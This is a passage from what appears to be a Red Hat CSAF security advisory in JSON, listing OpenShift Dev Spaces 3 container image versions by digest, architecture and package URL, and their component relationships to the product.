"name": "devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"product_id": "devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=3.21-6"
}
}
},
{
"category": "product_version",
"name": "devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"product": {
"name": "devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"product_id": "devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=3.21-11"
}
}
},
{
"category": "product_version",
"name": "devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"product": {
"name": "devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"product_id": "devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=3.21-1"
}
}
},
{
"category": "product_version",
"name": "devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"product": {
"name": "devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"product_id": "devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le",
"product": {
"name": "devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le",
"product_id": "devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=3.21-6"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"product": {
"name": "devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"product_id": "devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=3.21-5"
}
}
},
{
"category": "product_version",
"name": "devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"product": {
"name": "devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"product_id": "devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"product": {
"name": "devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"product_id": "devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=3.21-12"
}
}
},
{
"category": "product_version",
"name": "devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"product": {
"name": "devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"product_id": "devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces-tech-preview/idea-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"product": {
"name": "devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"product_id": "devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"product": {
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"product_id": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27?arch=amd64\u0026repository_url=registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"product": {
"name": "devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"product_id": "devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/machineexec-rhel9\u0026tag=3.21-4"
}
}
},
{
"category": "product_version",
"name": "devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"product": {
"name": "devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"product_id": "devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/devspaces-operator-bundle\u0026tag=3.21-25"
}
}
},
{
"category": "product_version",
"name": "devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"product": {
"name": "devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"product_id": "devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=3.21-7"
}
}
},
{
"category": "product_version",
"name": "devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"product": {
"name": "devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"product_id": "devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=3.21-6"
}
}
},
{
"category": "product_version",
"name": "devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"product": {
"name": "devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"product_id": "devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=3.21-11"
}
}
},
{
"category": "product_version",
"name": "devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"product": {
"name": "devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"product_id": "devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=3.21-1"
}
}
},
{
"category": "product_version",
"name": "devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"product": {
"name": "devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"product_id": "devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=latest"
}
}
},
{
"category": "product_version",
"name": "devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"product": {
"name": "devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"product_id": "devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=3.21-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64"
},
"product_reference": "devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64"
},
"product_reference": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x"
},
"product_reference": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le"
},
"product_reference": "devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x"
},
"product_reference": "devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le"
},
"product_reference": "devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64"
},
"product_reference": "devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64"
},
"product_reference": "devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le"
},
"product_reference": "devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x"
},
"product_reference": "devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le"
},
"product_reference": "devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64"
},
"product_reference": "devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x"
},
"product_reference": "devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64"
},
"product_reference": "devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le"
},
"product_reference": "devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x"
},
"product_reference": "devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64"
},
"product_reference": "devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le"
},
"product_reference": "devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x"
},
"product_reference": "devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x"
},
"product_reference": "devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64"
},
"product_reference": "devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le"
},
"product_reference": "devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64 as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64"
},
"product_reference": "devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x"
},
"product_reference": "devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le as a component of Red Hat OpenShift Dev Spaces 3",
"product_id": "9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le"
},
"product_reference": "devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"relates_to_product_reference": "9Base-RHOSDS-3"
},
{
"category": "default_component_of",
"full_product_name": {
